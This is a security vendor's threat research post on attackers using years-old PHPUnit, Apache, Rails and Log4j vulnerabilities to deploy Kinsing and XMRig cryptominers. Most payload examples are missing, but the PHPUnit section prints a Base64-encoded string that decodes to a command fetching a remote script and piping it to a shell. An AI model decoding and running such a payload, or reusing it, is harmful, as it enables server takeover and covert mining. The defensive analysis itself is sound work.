Cato CTRL Threat Research: Stuck in the Past – How Hackers Exploit Years-Old CVEs for Cryptojacking

Executive Summary 

While organizations focus on addressing the latest zero-day threats, threat actors continue to profit by targeting weaknesses that should have been resolved long ago. Some of these Common Vulnerability and Exposures (CVEs) date back nearly a decade, yet they remain heavily exploited today. This trend proves that old flaws never truly disappear.

Cato CTRL continuously monitors threats in real time, and our latest analysis of inbound traffic over the past 90 days (November 2024 – February 2025) revealed a concerning trend: threat actors are still leveraging long-standing vulnerabilities for cryptojacking. We are observing threat actors leveraging the Kinsing malware and XMRig for illicit mining of Monero.

We define inbound as traffic that doesn’t originate from within a network but attempts to enter the perimeter of a network.

Whether it involves a forgotten PHPUnit test file, a misconfigured Apache server, or an unpatched Log4j instance, these vulnerabilities remain prime targets for threat actors.

Figure 1. Top 10 exploited CVEs for inbound traffic for the past 90 days (November 2024 – February 2025)

Let’s take a closer look at the four most exploited vulnerabilities from Figure 1 and how they continue to fuel cybercrime.

Cato IPS, as part of the Cato SASE Cloud Platform, actively detects and blocks the attacks mentioned in this blog. This helps protect customers from all Cato-connected edges including sites, remote users, and cloud resources.

Technical Overview 

CVE-2017-9841: PHPUnit Command Injection Vulnerability

Vulnerability: Command injection (remote code execution)

Affected Product: PHPUnit (versions ≤ 5.6.2)

Impact: Allows attackers to execute arbitrary PHP code on the server

Affected Component: eval-stdin.php in PHPUnit’s testing framework

Attack Vector: Remote, via specially crafted requests

Severity: Critical

Percentage of total attacks: 24%

Summary: PHPUnit’s eval-stdin.php file flaw allows unauthenticated remote attackers to execute arbitrary commands on the host system. This affects applications that include PHPUnit as a development dependency but expose it in production environments.

Figure 2. CVE-2017-9841 exploitation patterns over time

This vulnerability is actively exploited, with multiple IPs targeting various victims. Our analysis shows that attackers primarily leverage this flaw to deploy cryptojacking malware, using a well-defined exploitation chain.

For instance, one observed attacker (92[.]255[.]57[.]58) exposed port 9000, which, when accessed, returned the response:

eval -i 1 —

c2hlbGxfZXhlYygnY3VybCBodHRwOi8vMTk0LjM4LjIwLjIvZXguc2h8c2gnKTs=

Upon decoding, it reveals a PHP shell execution command:

This command downloads and executes a bash script, which ultimately installs the Kinsing malware, which is used to mine cryptocurrency illicitly.

CVE-2021-41773: Apache HTTP Server Path Traversal & RCE

Vulnerability: Path traversal and remote code execution (RCE)

Affected Product: Apache HTTP Server 2.4.49 (and 2.4.50 under certain conditions)

Impact: Unauthorized file access and potential remote code execution

Affected Component: Path normalization in request processing

Attack Vector: Remote, via crafted requests

Severity: Critical

Percentage of total attacks: 17%

Summary: A flaw in Apache HTTP Server 2.4.49 allows attackers to exploit a path traversal vulnerability (../) to access arbitrary files outside the document root. If CGI scripts are enabled, this can lead to remote code execution. The issue was not properly patched in 2.4.50, making it still exploitable under specific configurations.

Figure 3. CVE-2021-41773 exploitation patterns over time

During our analysis of CVE-2021-41773 exploitation attempts, we observed a significant volume of attacks delivering XMRig (a Monero mining tool).

One such payload involved the following command:

This command attempts to fetch and execute a shell script from a remote server (94[.]156[.]177[.]109). The script is designed to establish persistence and deploy XMRig, covertly utilizing system resources for unauthorized cryptocurrency mining.

By exploiting this Apache vulnerability, attackers can gain unauthorized access to sensitive files and, in misconfigured environments, execute arbitrary code. When combined with cryptojacking payloads like XMRig, this leads to severe performance degradation, increased power consumption, and potential financial loss for affected organizations.

CVE-2014-0130: Ruby on Rails Directory Traversal

Vulnerability: Directory traversal

Affected Product: Ruby on Rails (versions before 4.1.0 and certain 3.x versions)

Impact: Unauthorized file access and potential information disclosure

Affected Component: Render method in Action View

Attack Vector: Remote, via specially crafted requests

Severity: High

Percentage of total attacks: 15%

Summary: A flaw in Ruby on Rails allows attackers to exploit improper file handling in the render method, enabling directory traversal attacks. By crafting malicious requests, an attacker can access arbitrary files on the server, potentially exposing sensitive application data.

Figure 4. CVE-2014-0130 exploitation patterns over time

Attackers are actively exploiting CVE-2014-0130, a directory traversal vulnerability in Ruby on Rails, to gain unauthorized access to sensitive system files. Our analysis revealed numerous attempts to retrieve critical configuration files such as:

These files provide valuable insights into the operating system version, architecture, and system configurations, which threat actors can leverage to escalate their attacks. By understanding the environment, they can tailor their exploitation techniques, deploy additional malware, or establish persistent access.

Although this vulnerability primarily enables information disclosure, it serves as an entry point for further compromise, making it a significant security risk—especially for servers running outdated or unpatched Rails versions.

CVE-2021-44228: Apache Log4j Remote Code Execution (Log4Shell)

Vulnerability: Remote code execution (RCE)

Affected Product: Apache Log4j (versions 2.0-beta9 to 2.14.1)

Impact: Allows unauthenticated remote attackers to execute arbitrary code

Affected Component: JNDI lookup in Log4j logging mechanism

Attack Vector: Remote, via malicious log data (e.g., user input, headers)

Severity: Critical

Percentage of total attacks: 10%

Summary: A critical flaw in Apache Log4j allows remote attackers to inject malicious JNDI lookups similar to the following code: 

This leads to arbitrary code execution. This affects a wide range of Java applications using vulnerable Log4j versions and can be exploited via various input sources such as HTTP headers, chat messages, or database logs.

Figure 5. CVE-2021-44228 exploitation patterns over time

Our analysis revealed widespread scanning activity targeting CVE-2021-44228, commonly known as Log4Shell, as attackers search for vulnerable applications. Beyond reconnaissance, we observed multiple attempts to exploit this vulnerability to deploy XMRig (a Monero mining tool).

One such exploitation attempt used the following payload:

When Base64-decoded, this payload executes the following command:

This script downloads and installs XMRig, effectively hijacking system resources to mine Monero without the victim’s consent. The long encoded string at the end represents a Monero wallet address, where mined cryptocurrency is deposited.

Why Are Old Vulnerabilities Still Being Exploited?

Attackers are continuing to exploit two vulnerabilities: CVE-2017-9841 (PHPUnit Remote Code Execution) and CVE-2014-0130 (Ruby on Rails Directory Traversal). This is largely due to the prevalence of outdated and misconfigured software in many systems.

The issue with PHPUnit’s remote code execution occurs because its test suite, intended for development purposes, is often mistakenly left exposed in production environments. This oversight allows attackers to execute arbitrary PHP commands remotely. Additionally, legacy Ruby on Rails 3.x applications are still in use, supported by long-term service offerings.

These vulnerabilities have become “commodity” threats, incorporated into botnets and various attacker toolkits. As long as unpatched software remains in production, attackers will continue to exploit these old vulnerabilities, which require minimal effort to exploit but offer high rewards.

Conclusion

Cato CTRL’s analysis highlights that threat actors continue to exploit old and unpatched vulnerabilities for financial gain. These persistent threats, often leveraged for cryptojacking, do not steal or encrypt data but silently hijack system resources. The impact is far-reaching—causing performance degradation, increased energy consumption, and hardware strain, ultimately affecting productivity and driving up operational costs.

Organizations must not underestimate these vulnerabilities. Cryptojacking may operate in the background, but its effects are very real, leading to system instability, financial losses, and heightened security risks. Effective mitigation requires continuous monitoring, proactive patching, and strong cybersecurity awareness to prevent unauthorized resource exploitation.

Protections 

Cato IPS, as part of the Cato SASE Cloud Platform, actively detects and blocks the attacks mentioned in this blog. This helps protect customers from all Cato-connected edges including sites, remote users, and cloud resources.